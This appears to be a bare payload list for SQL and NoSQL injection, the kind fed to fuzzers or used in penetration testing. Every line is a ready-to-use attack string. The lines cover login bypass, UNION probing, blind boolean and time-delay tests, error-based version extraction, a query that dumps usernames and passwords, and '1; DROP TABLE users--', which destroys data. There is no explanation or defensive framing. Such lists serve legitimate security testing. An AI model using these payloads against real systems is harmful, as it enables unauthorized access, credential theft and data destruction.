' OR '1'='1'--
' OR '1'='1'/*
" OR "1"="1"--
' OR 1=1--
' OR 'a'='a
') OR ('1'='1
1' ORDER BY 1--
1' UNION SELECT NULL--
1' UNION SELECT NULL,NULL--
1' UNION SELECT NULL,NULL,NULL--
' AND 1=1--
' AND 1=2--
' AND SUBSTRING(@@version,1,1)='5'--
' AND (SELECT COUNT(*) FROM users)>0--
admin'--
' WAITFOR DELAY '0:0:5'--
'; SELECT pg_sleep(5)--
' AND SLEEP(5)--
1; DROP TABLE users--
' UNION SELECT username,password FROM users--
{"$ne": ""}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "1==1"}
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version)))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)--
' OR BENCHMARK(5000000,MD5('test'))--
